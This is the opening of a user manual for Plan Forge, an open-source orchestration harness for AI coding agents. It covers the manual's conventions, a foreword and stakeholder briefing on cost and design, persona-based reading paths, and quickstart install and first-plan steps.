Complete offline edition — 79 chapters & appendices
Read this once, then read anything. Five minutes to learn the visual vocabulary the rest of the manual leans on.
The manual ships as a Quickstart + 5 Parts + 26 Appendices. The chapter numbering scheme tells you which kind of page you're on at a glance.
| Number | Means | Example |
|---|---|---|
| Q1 Q2 Q3 | Quickstart steps. The 30-minute zero-to-shipped path. | Q2 · Your First Plan |
| 1 2 … 24 | Numbered chapters across 5 Parts (Smelt → Forge → Guard → Learn). | Chapter 5 · Crucible |
| (unnumbered) | Sub-chapters and deep dives that hang off a numbered chapter. | Dashboard, LiveGuard |
| A B … N | Lettered appendices: reference material, runbooks, enterprise track. | Appendix K · Enterprise Reference Architecture |
| O | The Book Index: A–Z search across the whole manual. | Appendix O · Book Index |
This manual describes current behavior. We deliberately avoid NEW vX.Y badges and “introduced in vX.Y” stamps inside reference chapters — they age into anti-signals within a release or two and force every reader to know the version history of every feature.
For version-stamped history, see:
CHANGELOG.md: the canonical, machine-parseable list of what shipped when.
Maturity signals (BETA, deprecation warnings, security advisories) are kept inline because they describe a feature's current trust level, not its history.
Each numbered chapter opens with a hero image and may carry inline figures (SVG diagrams or photographs) inside the body. The conventions are deliberately uneven by chapter type:
| Page type | Hero image | Inline figures |
|---|---|---|
| Numbered chapter (1, 2, … 29) | Yes, assets/chapter-heroes/chN-hero.webp, 1024×768, generated. | Yes, numbered Figure N‑K via maintain.mjs. |
| Quickstart step (Q1, Q2, Q3) | Yes, same convention. | Optional. |
| Unnumbered sub-chapter (Dashboard, Settings, MCP Reference, deep dives) | No. Sub-chapters inherit visual weight from their parent. | Yes, un-numbered figures, still wrapped in <figure class="manual-figure">. |
| Reference appendix (Glossary, Quick Reference, Book Index, List of Figures, API Surface Index) | No. Reference pages favor density over decoration. | Rare, only when a diagram clarifies the reference. |
| Narrative appendix (Sample Project, Enterprise, Lessons Learned, History, About the Author) | Yes, same convention as numbered chapters. | Yes. |
Three flavors of inline aside, each colored for instant recognition. They never carry information that isn't also in the surrounding prose, so they are safe to skip on a first pass and useful on a second.
Code, terminal, and config samples come in a labelled block. The header tells you what the snippet is (a terminal command, a config file path, a JSON payload), and there's a Copy button on the right when the snippet is meant to be run as-is.
node docs/manual/maintain.mjs --audit
{
  "presets": ["dotnet"],
  "execution": { "quorum": "auto" }
}
Inside body prose, monospace means a literal name: a file path, an env var, a tool ID, or an argv flag. Italics mean a placeholder you fill in.
Inline SVGs and rasters live under docs/manual/assets/diagrams/. Each one carries an alt attribute that describes the diagram in prose, so readers using a screen reader (or readers who'd rather skim) get the full meaning without seeing the picture.
Diagrams come in three sizes (diagram-img-sm at 700 px, -md at 750 px, and -lg at 800 px), all centered in the body column. Every diagram is wrapped in a <figure> with a one-line italic caption underneath, derived automatically from the alt text title clause. To override an auto-caption with hand-authored prose, edit the <figcaption> directly and remove the <!--cap:auto--> marker; subsequent maintain.mjs runs will leave it alone.
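The auto-caption rule can be sketched in a few lines. This is an illustration only, not the logic inside maintain.mjs: the function names are hypothetical, the marker is assumed to sit at the start of the <figcaption>, and the "title clause" is assumed to be the alt text up to its first period.

```javascript
// Assumption: the "title clause" is the alt text up to the first period.
function titleClause(alt) {
  const end = alt.indexOf(".");
  return (end === -1 ? alt : alt.slice(0, end)).trim();
}

// Regenerate a caption only while the <!--cap:auto--> marker is still present.
// A caption without the marker is treated as hand-authored and returned untouched.
function refreshCaption(figcaptionHtml, alt) {
  const AUTO = "<!--cap:auto-->";
  if (!figcaptionHtml.includes(AUTO)) return figcaptionHtml;
  return `<figcaption>${AUTO}${titleClause(alt)}</figcaption>`;
}

const alt = "Pipeline overview. Six steps from intake to ship.";
console.log(refreshCaption("<figcaption><!--cap:auto-->Old caption</figcaption>", alt));
console.log(refreshCaption("<figcaption>Hand-written caption</figcaption>", alt));
```

Keeping the marker inside the element it governs means the override needs no separate configuration: deleting the marker is the opt-out.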
Some sentences refer to a count that changes between releases: "Plan Forge ships 102 MCP tools", "18 instruction files", "12 agents". Those numbers are tokenized in the page source and rewritten at build time from a single source of truth in docs/manual/assets/manual.js. You'll see the up-to-date number rendered, but if you View Source you'll see the token markers wrapping it.
Use <!--c:KEY-->NUMBER<!--/c--> instead of typing a literal number in chapter prose. Run node docs/manual/maintain.mjs after editing; it sweeps every chapter, fixes drift, and warns on unknown keys.
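A minimal sketch of how such a token sweep might work is shown here. It is not the real maintain.mjs: the `counts` table, its key names, and `rewriteCounts` are hypothetical, and only the `<!--c:KEY-->NUMBER<!--/c-->` marker shape comes from the text above.

```javascript
// Hypothetical single source of truth; the real keys and values live in the project.
const counts = { mcpTools: 102, instructionFiles: 18 };

// Matches <!--c:KEY-->NUMBER<!--/c--> and captures KEY.
const TOKEN = /<!--c:([\w-]+)-->[^<]*<!--\/c-->/g;

// Rewrite every known token from the table; collect unknown keys for a warning.
function rewriteCounts(source, table) {
  const unknownKeys = [];
  const text = source.replace(TOKEN, (match, key) => {
    if (!Object.hasOwn(table, key)) {
      unknownKeys.push(key); // leave the token untouched, report it
      return match;
    }
    return `<!--c:${key}-->${table[key]}<!--/c-->`;
  });
  return { text, unknownKeys };
}

const page =
  "Plan Forge ships <!--c:mcpTools-->99<!--/c--> MCP tools and <!--c:agents-->12<!--/c--> agents.";
const result = rewriteCounts(page, counts);
console.log(result.text);
console.log(result.unknownKeys);
```

In this sketch the stale 99 is corrected to the table value, while the unknown `agents` key is left as written and surfaced for a warning rather than silently dropped.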
| Where | What it gives you |
|---|---|
| Left sidebar | Always-visible chapter list grouped by Part. Collapses on narrow screens to a hamburger. |
| Sidebar search | Type to filter chapters and indexed sections. Matches both titles and the curated section index. |
| Prev / Next links | At the bottom of every chapter, in reading order. Skips deep-dive sub-chapters unless you're inside one. |
| Back-to-top button | Appears on long pages once you scroll past the first screen. |
| Appendix O — Book Index | A–Z list of every concept, tool, and named section. Letter jump-bar at the top. |
| Appendix P — List of Figures | Every numbered figure in the manual, in chapter order. Click to jump to the diagram in context. |
| Appendix A — Glossary | Definitions of every Plan Forge term. Read first if a chapter uses words you don't recognize. |
The cover offers four "where to next?" tiles: new to Plan Forge, on the GitHub stack, extending it, and on a different stack. Pick the path that matches what you're doing today and the manual stays roughly half its apparent size.
Every page footer (and the meta-bar at the top of the cover) shows the manual edition, pinned to the Plan Forge version it was published with. The full release history lives in CHANGELOG.md on GitHub.
pforge brain {status, hint, test, replay} subcommands; Team Dashboard tab added to the Forge group (now 19 tabs). Project History extended through v3.6 with v2.95 Lattice, v3.0 Copilot trilogy, v3.2–3.4 Team Mode. Refreshed counts (102 MCP tools, 97 CLI commands).
Spotted something that's wrong, stale, or missing? File an issue on github.com/srnichols/plan-forge with the chapter title and section heading. Manual fixes are tagged docs: in the changelog.
A year. From "getting enterprise-grade code out of an AI agent is nearly impossible" to a four-station forge shop that produces a 99/100 application in seven minutes. Same model. Same machine. No manual intervention. This Foreword frames what changed, what did not, and what the rest of the book teaches.
Plan Forge began in spring 2025 as a single 2,000-line copilot-instructions.md file written out of frustration with AI agents that could generate code faster than any human team but produced output without interfaces, without DTOs, without tests beyond the happy path, and without any concept of architectural discipline. Over the year that followed, the single file fractured into eighteen focused instruction files, then a six-step pipeline, then a four-session execution model, then a multi-model quorum, then an MCP server with a CLI and a dashboard, then a four-station shop (Smelt, Forge, Guard, Learn) with persistent memory, post-deploy defense, and a self-tempering audit loop. The model never got the credit. The variable was always context.
"The quality of AI-generated code is not a function of model capability, it's a function of the context you provide."
— From Impossible to 7 Minutes, May 2026
Run the same model against the same requirements on the same machine, twice. Once without guardrails. Once inside Plan Forge. The numbers come from a controlled A/B test documented in detail in Chapter 1.
The model was the same in both runs. So was the prompt, the hardware, the afternoon. What changed was the shop around the model. Scope contracts told it what to touch. Validation gates told it when a slice was done. The Plan Hardener turned a paragraph of feature description into an execution contract with explicit forbidden actions. The four-session architecture made sure the agent that built the code never reviewed its own work. The numbers are not a model story; they are an SDLC story.
What started as one file is now a workshop. Every phase of the software lifecycle has a station; every station is AI-run and product-owner-supervised; every station passes its work to the next through a contract the next station can verify.
| Station | Phase of the lifecycle | What it produces |
|---|---|---|
| 🪨 Smelt | Intake → scope contract | A hardened plan the Forge can execute without follow-up questions: scope boundaries, validation gates, forbidden actions, rollback steps |
| 🔨 Forge | Scope contract → shipped code | Green tests, green CI, green cost ledger, or an honest stop with a fix proposal at the slice that failed |
| 🛡️ Guard | Post-deploy defense (LiveGuard) | Pre-deploy block on severity ≥ high, post-slice drift advisory, triaged incidents with proposed fixes |
| 🧠 Learn | Memory & retrospectives | Tomorrow's plan is colder, faster, and less wrong than today's. Decisions persist across sessions in OpenBrain. |
The same lesson runs through all four. The model is not the bottleneck; context is. The shop is just more places to put context.
This book is the practical companion to that shop. It is three things at once, deliberately:
It is not a marketing brochure. The numbers in this book come from the same source files the system is built from: tool counts from capabilities.mjs, CLI flags from pforge.ps1, event names from EVENTS.md, cost figures from the same cost-service.mjs the orchestrator uses. When a number drifts in the code, the book breaks the build until the number is fixed.
It is not a tutorial that ends at "hello world." Every Part lands a reader at a different operational depth: Quickstart ships your first plan in thirty minutes; Part II carries you through autonomous orchestration; Part III through post-deploy defense; Part IV through institutional memory; Part V through team-scale coordination.
It is not a product spec. The shop changes. The principles do not. When the book describes why the four-session architecture exists, that section will still be true two model generations from now, even if the model names in the example commands change.
It is also not a process you rent from us. Plan Forge is MIT-licensed because no two shops' SDLC is the same, and your institutional memory lives in OpenBrain, a service you run, not in any vendor's cloud. The two most strategic assets a software organization accumulates (its process for shipping software, and the memory of why every past decision went the way it did) stay in your hands. The harness is yours to fork and tweak; the brain is yours to host. The book documents both because the architecture only makes sense once both are explicit.
The book is designed so a reader who has never installed Plan Forge can land on a working pipeline in thirty minutes, and a reader who has been running it for six months can find the one paragraph that explains a behavior they just saw in production. Both readers start in different places.
| If the reader is… | Start here | Then read |
|---|---|---|
| First-contact, never run Plan Forge | Quickstart Q1 — Install | Q2 (first plan), Q3 (review & ship), then Chapter 1 for the mental model |
| Frame-setting, wants the mental model first | Chapter 1 — What Is Plan Forge? | Chapter 2 for the pipeline, then back to the Quickstart for hands-on |
| Operator, already shipping with it | Chapter 15 — Troubleshooting or the CLI Reference | Targeted dives by symptom or by tool name |
| Reviewer / architect, evaluating for adoption | Appendix H — GitHub Stack Alignment | Appendix I for the substrate map, then Chapter 1 for the four-station overview |
| Curious, wants the story | This Foreword | The blog posts cited above, then Project History for the version-by-version evolution |
A dedicated Reader-Journey Ladders page sits next to this Foreword in Front Matter and unfolds those paths into per-persona deep-dive sequences (solo developer, team lead, reviewer or architect, enterprise architect, extension author), each ending at a concrete ship-it moment. When the reader knows which persona they are, the Ladders are the next stop.
For the reader who needs to walk a colleague, a manager, or a VP through the adoption decision in a single sitting, the Stakeholder Briefing, also in Front Matter, is the 10–15 minute white-paper version: eight sections, bold lead sentences, all the canonical numbers, the same source-of-truth as the rest of the book, and a closing tailoring flow with a template and a slash-command skill for remixing the briefing for the reader's own organization.
For the reader who prefers to start from worked examples rather than from architecture, Appendix R — A Day in the Forge collects three short case studies absorbed from contemporary blog posts: the closed-loop audit of a production Next.js site, the .NET 99-vs-44 A/B test against vibe coding, and the three-model quorum run that paid $0.22 for measurably better software. Each vignette ends with a cross-link into the canonical chapter that owns the topic.
For the reader who needs to answer the question a manager or VP will eventually ask — “how much will this cost us?” — Chapter 31 — Cost & Economics is the single-chapter answer: the four levers that determine total cost, the compounding flywheel that bends the cost curve downward over a project's lifetime, and the quorum-mode trade-offs a team lead needs to set a realistic budget.
The body of this manual is written in third person, present tense, the voice of a reference. That is deliberate: a reference outlives the version that produced it, and the third-person voice carries forward without re-editing when the maintainer changes, the contributor base grows, or the project's center of gravity moves outside any one author. Direct first-person material from the project's blog posts appears in blockquote form, attributed, so the reader can see where the editorial voice ends and the contemporary record begins.
This Foreword and the Reader Paths page break that rule once, narrowly, by leaning on the journey itself. Every other chapter speaks in the reference voice.
"The forge is lit. The metal is hot. Build something that lasts."
— From Impossible to 7 Minutes, May 2026
The rest of the book is the map for doing exactly that.
A skimmable, self-contained, eight-section white paper sized for the longest read a busy manager or VP gives you in one sitting. Designed to be shared as one link, read end-to-end without leaving the page, and remixed into a per-organization briefing using the three-path ladder in Section 8.
Who this is for. The internal champion who has already decided Plan Forge deserves serious evaluation and now needs to walk a colleague, a manager, or a VP through the decision. What this is not. A marketing landing page (those live at planforge.software) and not a replacement for a per-prospect briefing (those still need writing; this just hands you the ~50% that is canonical so you can spend your time on the ~50% that is yours).
How to read it. ≈10–15 minutes end-to-end. Each section opens with a bolded lead sentence, then bullets, then a "Read more →" link into the canonical chapter for the reader who wants to drill in. Every headline number is sourced from the same place as the rest of the book (see the Project History for the version stamps); the briefing and the manual cannot drift.
AI coding tools get a feature from prompt to running code in minutes, and then leave the rest of the SDLC to humans. Plan Forge is the orchestration harness that closes that gap. It sits on top of GitHub Copilot (and any other AI coding tool that speaks the Model Context Protocol) and adds the four layers production software actually needs: planning, validation gates, memory, and reviewer separation. The receipt on the project's own seven-slice memory-QA plan is $0.07 on a single mid-tier model in roughly 51 minutes, zero failed slices, zero escalation. The system QA'd itself with the very upgrades it was QA'ing, for the price of a coffee.
Read more → Foreword — From Impossible to Seven Minutes (10 min, the year-long story behind the receipt).
Plan Forge is the orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). It does not replace your model or your IDE; it adds the SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation. It is also licensed MIT because your SDLC is yours, and your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor.
The two axes of the claim (harness on substrate, and your-SDLC-is-yours) matter in equal measure. The first one explains why Plan Forge does not compete with GitHub Copilot, Claude Code, Cursor, Codex, Gemini CLI, or Windsurf; it routes work through them. The second explains why nothing in the harness is rented, gated, or trapped behind a control plane the user does not own. The condensed positioning table:
| Plan Forge is | Plan Forge is not |
|---|---|
| The orchestration harness on top of GitHub Copilot and other AI coding tools. | An AI model. Plan Forge works with whatever AI is already in the IDE. |
| The SDLC layer (planning, validation, memory, cost, reviewer separation) GitHub deliberately leaves to the ecosystem. | A code generator. Plan Forge does not write the code; it tells the model how to, then verifies the result. |
| Opinionated about software shape: interfaces, DTOs, typed exceptions, tests. | Opinionated about the stack. Nine presets cover .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC. |
| MIT-licensed because your SDLC is yours. | A managed cloud service or a process you rent. Plan Forge runs entirely inside your existing IDE, CLI, and repo. |
| Tied to your repo's source of truth via GitHub Issues, PRs, and Actions. | A CI/CD system. It does not deploy your app; it validates that what was built matches what was planned. |
| Designed so institutional memory lives in OpenBrain, a user-owned service. | A project manager. It does not assign work to humans or track sprints; it structures work for AI agents. |
Read more → Chapter 1 — What Is Plan Forge? (full IS / IS NOT table plus the four-station overview).
Plan Forge is cheap to run because four mechanical levers compound, not because the model rate is low. Each lever is independently measurable and independently dial-able. A team that turns all four on can run a hardened plan end-to-end for cents; a team that turns them off pays whatever the model bills. The levers, in order of typical impact:
| Lever | What it does | Typical impact |
|---|---|---|
| 1. Auto-escalation | Runs every slice on the cheapest model that can pass the gate. Escalates to a stronger model only when the cheaper one fails. | Plans that used to default to a flagship model now run start-to-finish on a mid-tier model. The Phase-MEMORY-QA plan: 7 slices, $0.07 total, no escalation. |
| 2. Validation gates | Every slice ends in a concrete shell command (tests, lint, type-check). The next slice does not start until the gate is green. | The cost of finding a regression collapses to one slice's spend instead of a whole plan's. Drift dropped 64% over 90 days on the project's own memory-QA stream. |
| 3. Scope contract | The plan lists exactly which files are in-scope, out-of-scope, and forbidden. The orchestrator blocks edits outside scope. | The model spends its tokens on the work, not on speculative side-quests. Quorum mode adds about $0.22 of overhead on a representative C# invoicing slice and produces +20% tests with reusable helpers (see the A/B run in Chapter 7). |
| 4. Memory layer | Past decisions, past gates, past fixes are recalled into the next plan's context via OpenBrain instead of being re-derived from scratch. | Tomorrow's plan starts where yesterday's left off. The compounding flywheel: each plan runs colder, faster, and less wrong than the last. |
Read more → Advanced Execution — Cost Optimization (the canonical lever table, the full math, the quorum-mode A/B run) and Dashboard — Cost Tab (the cost-ledger walk-through).
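The first three levers can be sketched together in a few lines. This is a hedged illustration under stated assumptions, not the orchestrator's code: the tier names, per-slice costs, `runSlice`, `attempt`, and `gate` are all hypothetical stand-ins, and blocking immediately on a scope violation is one possible design choice among several.

```javascript
// Hypothetical model tiers, cheapest first; names and costs (in cents) are illustrative.
const tiers = [
  { name: "small", costCents: 1 },
  { name: "mid", costCents: 5 },
  { name: "flagship", costCents: 40 },
];

// Lever 3: list edited files that are forbidden or simply not in scope.
function outOfScope(editedFiles, scope) {
  return editedFiles.filter(
    (file) => scope.forbidden.includes(file) || !scope.inScope.includes(file)
  );
}

// Levers 1 and 2: try the cheapest tier first and escalate only when the gate fails.
// attempt(tierName) stands in for a model run and returns the files it edited;
// gate(tierName) stands in for the slice's shell command and returns true when green.
function runSlice(slice, attempt, gate) {
  let spentCents = 0;
  for (const tier of tiers) {
    spentCents += tier.costCents;
    const violations = outOfScope(attempt(tier.name), slice.scope);
    if (violations.length > 0) {
      return { status: "blocked", tier: tier.name, spentCents, violations };
    }
    if (gate(tier.name)) {
      return { status: "green", tier: tier.name, spentCents, violations };
    }
  }
  return { status: "failed", tier: null, spentCents, violations: [] };
}

const slice = {
  scope: { inScope: ["src/invoice.js", "test/invoice.test.js"], forbidden: ["package.json"] },
};
const outcome = runSlice(
  slice,
  () => ["src/invoice.js"],
  (tierName) => tierName !== "small" // pretend the small tier fails the gate
);
console.log(outcome);
```

Costs are tracked in integer cents to avoid floating-point drift in the ledger. The escalation loop only pays for a stronger tier after a cheaper one has demonstrably failed the gate, which is the behavior the table attributes to auto-escalation.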
A vibe-coding pipeline runs the same plan tomorrow at the same cost it ran today. A Plan-Forge pipeline runs tomorrow's plan a bit colder: the gates that were tight yesterday are still tight, the patterns that worked are recalled, the patterns that failed are flagged in the lattice before the model touches the file. After ninety days, the same plan that cost a dollar on day one costs a fraction of that on day ninety, with fewer escalations, fewer failed slices, and fewer reviewer-found defects. That curve is what compounds.
Three concrete mechanisms make the curve real, not aspirational:
Read more → Memory System chapter (architecture, the Phase-MEMORY-QA receipt, and the four pieces that make the recall layer concrete: Hallmark, Anvil, Lattice, and sync_memories).
The brief above covers the things teams come to Plan Forge for. A handful of capabilities ship in the same box without being part of the headline pitch; they exist because they kept being the missing piece in production AI-SDLC adoptions and adding them once was cheaper than re-explaining their absence to every new team. None of them is hidden, gated, or paywalled; they ship in the same MIT-licensed harness as everything else.
Read more → Chapter 1 — The Virtual Engineering Team (role map + your three jobs), Forge-Master chapter (agents supervising agents), and Appendix J — Plan Forge for Enterprise (multi-tenancy, data residency, compliance posture).
There are two ways to adopt Plan Forge, and they are both first-class. Neither one is a downgrade of the other; the right route depends on whether your organization needs the harness to look like your shop or the community's shop. Both routes terminate at the same place: a hardened, gated, memory-backed pipeline running against your repo with audit trail on every artifact.
setup.ps1 (or setup.sh) against the preset that matches your stack, and start running pforge run-plan against your plans within the hour. Stay on the community upgrade cadence; PRs flow upstream when something is generally useful, locally when something is yours alone. Best for teams that want to skip the build phase and adopt a working pipeline today.
Read more → Installation chapter (route A, step-by-step) and Customization chapter (route B, the customization spine).
An SDLC harness is the wrong layer to rent. Renting the model is fine, the model is interchangeable, replaceable, and improves on a vendor's roadmap that is not your problem to manage. Renting the orchestration on top of the model is a category mistake. The orchestration is where your decisions live, where your audit trail accumulates, where your compliance posture is encoded, and where your institutional memory is stored. The closer that layer sits to your business, the worse the lock-in if you do not own it.
Four things change when the harness is open source and the memory layer is user-owned:
Read more → Memory System chapter (the user-owned memory layer) and Customization chapter (the customization spine).
The eight sections above are the ~50% of any per-organization briefing that is canonical. The other ~50% (the parts that name your squads, your KPIs, your pilot timeline, your ask) cannot and should not be pre-written. They are the parts the internal champion has to author or commission. The tailoring flow is the path from this generic briefing to that per-organization briefing, without anyone needing to open an issue and wait for a maintainer to respond. Three paths, in increasing order of Plan Forge involvement:
| Path | Effort | What you do | Best for… |
|---|---|---|---|
| 1. Template | ~5 minutes | Copy the stakeholder-briefing template from GitHub. Fill the five placeholders (<<COMPANY>>, <<SQUADS>>, <<KPIS>>, <<PILOT_TIMELINE>>, <<THE_ASK>>). Publish where your org publishes briefings. | The internal champion who already knows the answers and just wants a structured document. |
| 2. Skill | ~15 minutes | Invoke /stakeholder-briefing in your AI coding tool (the skill ships with Plan Forge). The skill prompts for the five placeholders, optionally takes a --source-dir pointing at your existing strategy materials, and uses forge_search to pull relevant context into the prospect-specific sections. Output is a filled briefing as markdown or HTML. | The internal champion who wants Plan Forge to draft the prospect-specific 50% from existing materials. |
| 3. Community | days, async | Open a discussion in the Plan Forge repo with your draft. A maintainer or community reviewer critiques structure, sharpens claims, and flags overreach. No SLA, this is the open-source long tail. | The champion who has a draft and wants a second pair of eyes before sending it to a VP. |
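For the template path, the fill step is simple enough to sketch. The following is an illustration, not the shipped skill: `fillBriefing` and the sample values are hypothetical, and only the five `<<...>>` placeholder names come from the table above.

```javascript
// The five placeholders named in the template path.
const PLACEHOLDERS = ["COMPANY", "SQUADS", "KPIS", "PILOT_TIMELINE", "THE_ASK"];

// Substitute every placeholder that has a value; report the ones still unanswered.
function fillBriefing(template, values) {
  const missing = PLACEHOLDERS.filter((key) => !values[key]);
  const text = template.replace(/<<([A-Z_]+)>>/g, (match, key) =>
    values[key] ? values[key] : match
  );
  return { text, missing };
}

const draft = fillBriefing("<<COMPANY>> pilot: <<PILOT_TIMELINE>>. Ask: <<THE_ASK>>", {
  COMPANY: "Contoso",
  PILOT_TIMELINE: "6 weeks",
});
console.log(draft.text);
console.log(draft.missing);
```

Leaving unanswered placeholders visible in the output, rather than replacing them with blanks, makes an unfinished briefing obvious before it reaches a VP.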
The closing thought is deliberately recursive: the briefing about Plan Forge ends by inviting the reader to use Plan Forge to remix the briefing. That is the demo. A tool whose closing CTA is "open an issue and wait" is selling something other than what its first seven sections claimed. A tool whose closing CTA is "here is the template, here is the skill, here is the community, pick the one that matches your effort budget" has the same shape inside and outside.
A blacksmith doesn't hand raw iron to a customer. They smelt it, hammer it, temper it, and then they watch, because a blade that isn't maintained will dull.
The briefing above is the case made in ten minutes. The book is the case made in detail, station by station, decision by decision, with the receipts. The Foreword opens the door; the Reader-Journey Ladders pick the path; the chapters do the work. Start anywhere; the harness is yours either way.
The Foreword offered a five-row teaser table for the impatient. This page is the longer version. Five persona ladders, each an ordered sequence of chapters and appendices, each with a ship-it moment so you know when you have actually arrived somewhere instead of just reading.
Pick the ladder that matches the work in front of you. Two ladders may apply. That is fine: climb the one whose ship-it moment is closer to today's problem. The book is designed so any ladder lands you on a useful artifact within a sitting or two of reading.
| If you are… | The ladder is for you when… | First rung |
|---|---|---|
| Solo developer | You ship code alone (a side project, a one-person service, an MVP). You want guardrails without the team-coordination overhead. | Q1 — Install |
| Team lead | You run a 2–5 person engineering team. You need to onboard developers onto a shared pipeline and explain the choice upward. | Chapter 1 — What Is Plan Forge? |
| Reviewer or architect | You are evaluating Plan Forge for adoption. You need the substrate map, the cost calculus, and the lock-in story before you can recommend or reject. | Appendix H — GitHub Stack Alignment |
| Enterprise architect | You ship across multiple teams under compliance and audit requirements. You need multi-tenancy, data residency, and an operational playbook before pilot. | Appendix J — Plan Forge for Enterprise |
| Extension author | You want to extend Plan Forge with a new tool, a new agent, a new skill, or a new notifier. You need the MCP surface and the customization spine. | Chapter 1 — What Is Plan Forge? |
None of these fits? Read the Foreword, then the first chapter, then follow your curiosity. The sidebar is your friend; the Index and site search handle the rest.
You are here if you are the only one shipping code on your project. You want Plan Forge's structural quality benefits (interfaces, DTOs, typed exceptions, tests; see the 99-vs-44 evidence in Chapter 1) without the team-coordination machinery. The Quickstart trilogy gets you from zero to a shipped feature in thirty minutes; the rest of the ladder turns that one-shot into a habit.
pforge smith.
pforge CLI is the surface you will live in.
docs/plans/, run it autonomously via pforge run-plan, watch the slices land green, and ship the feature, all without leaving the terminal or asking another human to review the AI's work.
Skip for now (come back later if you grow): team coordination, multi-agent setup, enterprise reference architecture. They will be waiting when you need them.
You are here if you run a small engineering team and you are deciding whether to bring Plan Forge in. Two problems sit on top of you: convincing the team (and whoever signs off), and operating the pipeline once it is running. The ladder covers both, in that order.
You are here if you have been asked to evaluate Plan Forge. The decision is whether your organization should adopt it, and if so, how. Three things matter to you: where it sits relative to what you already run (GitHub, Copilot, your CI), what it costs and what it locks you into, and whether the architecture survives the questions a senior engineer will ask after twenty minutes of reading.
You are here if you are taking Plan Forge into an environment with compliance requirements, multi-team isolation, audit trails, and a procurement process. The reviewer ladder above answered “should we adopt?” This ladder answers “how do we deploy it safely across the organization?”
You are here if you want to extend Plan Forge: add a tool, a skill, an agent, a notifier, or a custom workflow. The ladder starts with the mental model, walks through the customization spine, and lands on the MCP surface and the extension catalog.
Some readers will fit two ladders: a team lead who is also evaluating adoption, an enterprise architect who wants to author an internal extension, a solo developer who later inherits a team. The ladders are not exclusive. The recommended hops:
| You started as… | You also need… | Hop directly to… |
|---|---|---|
| Solo developer | To onboard a second developer | Team-lead ladder, rung 4 (Chapters 6 & 7), then rung 6 (Multi-Agent) |
| Team lead | To pitch upward | Reviewer/architect ladder, rungs 1–3 (Apps H, I + Chapter 1) |
| Reviewer or architect | To recommend a deployment topology | Enterprise ladder, rungs 1–2 (Apps J & K) |
| Enterprise architect | To customize the fleet | Extension-author ladder, rung 5 (Customization) |
| Extension author | To publish to the catalog | Chapter 12 + the PUBLISHING.md guide on GitHub |
This page, like the Foreword, addresses the reader in second person (“you are here if…”) rather than the third-person reference voice used in the rest of the manual. That is the narrow exception called out in the Foreword's note on voice: the Foreword and the Reader Paths page lean on the reader's journey because their job is the journey. Every other chapter speaks in the reference voice.
The book is the map; the ladder is the route. Start at rung one of your ladder. The ship-it moment marks the top, and from there you can either start a new ladder or follow your own curiosity through the rest of the manual.
Zero to pforge smith green in 10 minutes.
This is the fast path. For full options (polyglot presets, multi-agent adapters, updating) see Chapter 3: Installation.
What you need depends on how you'll drive Plan Forge. Three of the four prerequisites are universal; Node.js is only needed when you want the dashboard, MCP server, or REST API.
| Tool | Minimum | Check | Required for |
|---|---|---|---|
| Git | 2.30+ | git --version | Everyone: required by setup, all CLI commands, and version-aware features. |
| VS Code (or Insiders) | 1.99+ | code --version | UI path: prompts, agents, skills, and the Copilot integration all live inside VS Code. |
| GitHub Copilot extension | Active subscription | Copilot icon in status bar | UI path: powers the chat prompts and the hardening pipeline. |
| Node.js | 18+ | node --version | CLI / server path: needed for the dashboard, the MCP server, pforge.ps1 / pforge.sh, and the 102 tools. Skip if you'll only use prompts + instructions + agents inside Copilot Chat. |
| OpenBrain (optional, recommended) | Latest | pforge brain hint | L3 semantic memory (PostgreSQL + pgvector). Unlocks Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools. Use the Plan-Forge-tuned fork at srnichols.github.io/OpenBrain; the upstream OpenBrain has been modified to align with Plan Forge's hub schema and Hallmark provenance. See Chapter 21: Memory Architecture for how it wires into .forge.json, the dashboard, and the three-tier model. |
The setup.ps1 / setup.sh wizard runs in either path. If Node.js isn't installed, it skips the MCP server scaffold and still wires up the prompts, instructions, agents, and skills inside .github/.
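The minimums in the table can be checked mechanically. The following is a minimal sketch, not part of Plan Forge: the helper names `parse_version` and `meets_minimum` are hypothetical, and the sample strings stand in for the output of the Check commands listed above.

```python
import re

# Minimum versions copied from the prerequisites table.
MINIMUMS = {"git": (2, 30), "code": (1, 99), "node": (18,)}


def parse_version(output: str) -> tuple:
    """Extract the first dotted version number from a tool's --version output."""
    match = re.search(r"(\d+(?:\.\d+)*)", output)
    if match is None:
        raise ValueError(f"no version number found in {output!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def meets_minimum(tool: str, output: str) -> bool:
    """Return True when the reported version is at or above the table's minimum."""
    return parse_version(output) >= MINIMUMS[tool]


if __name__ == "__main__":
    # Sample outputs; in practice these would come from running the commands.
    samples = {"git": "git version 2.44.0", "code": "1.99.0", "node": "v22.3.0"}
    for tool, output in samples.items():
        status = "ok" if meets_minimum(tool, output) else "too old"
        print(f"{tool}: {status}")
```

Versions are compared as integer tuples, so 2.30 correctly ranks above 2.4, which a plain string comparison would get wrong.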
A short command sequence gets you from zero to a fully configured forge:
# PowerShell (Windows)
git clone https://github.com/srnichols/plan-forge.git my-forge
cd my-forge
.\setup.ps1 -Preset <your-stack>
# Bash (macOS / Linux)
git clone https://github.com/srnichols/plan-forge.git my-forge
cd my-forge
chmod +x setup.sh && ./setup.sh --preset <your-stack>
# Existing project: point the wizard at it with -ProjectPath
.\setup.ps1 -ProjectPath ../my-app -Preset typescript
Replace <your-stack> with one of these nine presets:
pforge smith
Run the Smith diagnostic to confirm everything is green:
.\pforge.ps1 smith
Environment:
✓ git 2.44.0
✓ code 1.99.0
✓ PowerShell 7.5.0
✓ node 22.3.0
Setup Health:
✓ .forge.json valid
✓ 21 instruction files
✓ 19 agent definitions
Results: 10 passed | 0 failed | 0 warnings
A failed check prints a FIX: suggestion inline. Most common: add "chat.agent.enabled": true to .vscode/settings.json. See Troubleshooting for more.
Specify, harden, and execute a feature in 15 minutes.
This is the essential path through Steps 0–3. For the full walkthrough (sweep, review, ship, and everything in between) see Chapter 6: Your First Plan.
pforge smith should show all green. Have VS Code open with GitHub Copilot active.
You'll build a GET /health endpoint, deliberately simple so you can focus on the pipeline, not the code. You'll run three steps: specify → harden → execute. The endpoint takes about 15 minutes to build; the pipeline knowledge you gain applies to every feature after this.
1. Open Copilot Chat: Ctrl+Shift+I (Windows) · Cmd+Shift+I (Mac)
2. Attach .github/prompts/step0-specify-feature.prompt.md
3. Replace <FEATURE-NAME> with health-endpoint and send
